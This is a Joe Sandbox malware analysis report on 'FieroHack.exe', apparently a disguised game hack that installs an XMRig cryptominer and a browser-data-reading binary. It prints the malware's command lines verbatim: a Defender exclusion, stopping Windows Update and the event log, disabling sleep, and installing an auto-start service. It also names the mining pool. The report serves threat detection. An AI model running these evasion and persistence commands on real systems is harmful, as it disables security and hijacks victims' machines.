Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FieroHack.exe

Overview

General Information

Sample name:FieroHack.exe
Analysis ID:1464754
MD5:b88f61a7938ef8af011259c59efc3d3d
SHA1:ba6f4356993959799fbd88bb350558045c363a85
SHA256:640397d3d855cbb8e3400f7564294bae51d591f7adb0f7856b7acfeb47f4e3d2
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates files in the system32 config directory
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sets debug register (to hijack the execution of another thread)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • FieroHack.exe (PID: 6896 cmdline: "C:\Users\user\Desktop\FieroHack.exe" MD5: B88F61A7938EF8AF011259C59EFC3D3D)
    • WeMod.exe (PID: 4340 cmdline: C:\Users\user\AppData\Roaming\WeMod.exe MD5: 6A2D1FD5BA3F75656E23FEEF98269C17)
      • powershell.exe (PID: 6680 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6872 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 5820 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 7100 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1396 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2816 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2932 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 344 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7156 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6228 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6680 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 2652 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1196 cmdline: C:\Windows\system32\sc.exe delete "BFFESVJT" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4180 cmdline: C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5820 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6768 cmdline: C:\Windows\system32\sc.exe start "BFFESVJT" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2672 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WeMod.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 3616 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
    • Sirus.exe (PID: 5960 cmdline: C:\Users\user\AppData\Roaming\Sirus.exe MD5: 35161C329ACE0D7440101EEBBE9BF7A4)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 2004 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6680 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • leirdnhqqedj.exe (PID: 6796 cmdline: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe MD5: 6A2D1FD5BA3F75656E23FEEF98269C17)
    • powershell.exe (PID: 4624 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5432 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3548 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 5408 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3156 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1640 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1464 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2676 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3672 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3904 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2108 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1720 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 2736 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000045.00000002.4114240353.0000000000A96000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    Process Memory Space: explorer.exe PID: 2736JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

      Sigma Signatures

      Change of critical system settings

      barindex
      Sigma detected: Disable power options
      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7156, ProcessName: powercfg.exe

      System Summary

      barindex
      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6680, ProcessName: powershell.exe
      Sigma detected: Powershell Defender Exclusion
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6680, ProcessName: powershell.exe
      Sigma detected: New Service Creation Using Sc.EXE
      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto", ProcessId: 4180, ProcessName: sc.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6680, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2004, ProcessName: svchost.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Stop EventLog
      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5820, ProcessName: sc.exe

      Snort Signatures

      Timestamp:06/30/24-01:34:52.402369
      SID:2047928
      Source Port:57509
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: FieroHack.exeAvira: detected
      Multi AV Scanner detection for domain / URL
      Source: pool.supportxmr.comVirustotal: Detection: 9%Perma Link
      Multi AV Scanner detection for submitted file
      Source: FieroHack.exeReversingLabs: Detection: 48%
      Source: FieroHack.exeVirustotal: Detection: 46%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability

      Bitcoin Miner

      barindex
      Yara detected Xmrig cryptocurrency miner
      Source: Yara matchFile source: 00000045.00000002.4114240353.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2736, type: MEMORYSTR
      Source: FieroHack.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: FieroHack.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.dr
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h7_2_025B1298
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then jmp 025B5E56h7_2_025B5E20
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then jmp 025B7F25h7_2_025B7EB8
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h7_2_025B1297
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_025B10D4
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_025B10E0
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then jmp 025B5E56h7_2_025B5E10
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then jmp 025B7F25h7_2_025B7EB4
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]7_2_053993C9
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]7_2_05395F54
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then jmp 05BF1744h7_2_05BF1718
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 4x nop then jmp 05BF1744h7_2_05BF1708

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2047928 ET TROJAN CoinMiner Domain in DNS Lookup (pool .supportxmr .com) 192.168.2.4:57509 -> 1.1.1.1:53
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 141.94.96.144 9000
      Source: global trafficTCP traffic: 192.168.2.4:49742 -> 141.94.96.144:9000
      Source: Joe Sandbox ViewIP Address: 141.94.96.144 141.94.96.144
      Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`,^q equals www.youtube.com (Youtube)
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `,^q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
      Source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
      Source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
      Source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
      Source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
      Source: WeMod.exe.0.dr, leirdnhqqedj.exe.2.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
      Source: svchost.exe, 00000023.00000002.2205326641.0000020AFD28E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: WeMod.exe.0.dr, leirdnhqqedj.exe.2.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFCFD8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: edb.log.35.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
      Source: edb.log.35.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: edb.log.35.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFCFD8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFCFD8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: svchost.exe, 00000023.00000003.1960939694.0000020AFD00D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.35.dr, edb.log.35.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.35.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: FieroHack.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: FieroHack.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: WeMod.exe.0.dr, leirdnhqqedj.exe.2.drString found in binary or memory: http://ocsp.sectigo.com0
